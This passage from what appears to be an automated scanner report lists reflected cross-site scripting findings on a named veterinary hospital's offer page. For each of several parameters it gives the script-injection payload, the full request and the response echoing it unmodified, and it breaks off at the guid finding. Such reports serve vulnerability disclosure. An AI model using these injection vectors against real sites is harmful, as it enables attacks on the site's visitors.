GET /hanson/offer.html?addr=998d7"><script>alert(1)</script>24a59a02e19 &captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d
%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:51:59 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=o6021kabr6ia1bncmhj0ivp1j3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19421 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input name="addr" id="addr" type="text" size="50" class="req" maxlength="255" value="998d7"><script>alert(1)</script>24a59a02e19 " />...[SNIP]...
2.9. http://www.vcahospitals.com/hanson/offer.html [captcha_code parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson/offer.html
Issue detail
The value of the captcha_code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 913cb"><script>alert(1)</script>e854b346b04 was submitted in the captcha_code parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hanson/offer.html?addr=&captcha_code=913cb"><script>alert(1)</script>e854b346b04 &city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d
%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:52:03 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=8oag095b9alesr04oe0qrcema0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19378 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=913cb"><script>alert(1)</script>e854b346b04 &city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcah...[SNIP]...
2.10. http://www.vcahospitals.com/hanson/offer.html [city parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson/offer.html
Issue detail
The value of the city request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75bbf"><script>alert(1)</script>a5aae805f3c was submitted in the city parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hanson/offer.html?addr=&captcha_code=&city=75bbf"><script>alert(1)</script>a5aae805f3c &email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d
%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:52:07 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=odcmj1resusthd8a2o5c117463; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19421 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input name="city" id="city" type="text" size="40" class="req" maxlength="255" value="75bbf"><script>alert(1)</script>a5aae805f3c " />...[SNIP]...
2.11. http://www.vcahospitals.com/hanson/offer.html [email parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson/offer.html
Issue detail
The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a242"><script>alert(1)</script>c14d1d110d8 was submitted in the email parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hanson/offer.html?addr=&captcha_code=&city=&email=8a242"><script>alert(1)</script>c14d1d110d8 &fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d
%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:52:11 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=p2odhpks37cmhn3tkfcpdu3fp4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19421 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input name="email" id="email" type="text" size="40" maxlength="255" value="8a242"><script>alert(1)</script>c14d1d110d8 " />...[SNIP]...
2.12. http://www.vcahospitals.com/hanson/offer.html [fname parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson/offer.html
Issue detail
The value of the fname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f51a8"><script>alert(1)</script>4d0141775d0 was submitted in the fname parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=f51a8"><script>alert(1)</script>4d0141775d0 &formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d
%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:52:16 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=4b778k6m2ab1pu0m5ssdhgvgn4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19421 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input name="fname" id="fname" type="text" size="30" class="req" maxlength="50" value="f51a8"><script>alert(1)</script>4d0141775d0 " />...[SNIP]...
2.13. http://www.vcahospitals.com/hanson/offer.html [formtype parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson/offer.html
Issue detail
The value of the formtype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d61d6"><script>alert(1)</script>e3343c73882 was submitted in the formtype parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITALd61d6"><script>alert(1)</script>e3343c73882 &guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d
%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:52:20 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=jvjkp2a3ouqtrsla9j7rqfi8m5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19378 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITALd61d6"><script>alert(1)</script>e3343c73882 &guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3fa...[SNIP]...
2.14. http://www.vcahospitals.com/hanson/offer.html [guid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson/offer.html
Issue detail
The value of the guid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1c92"><script>alert(1)</script>166b7134f96 was submitted in the guid parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
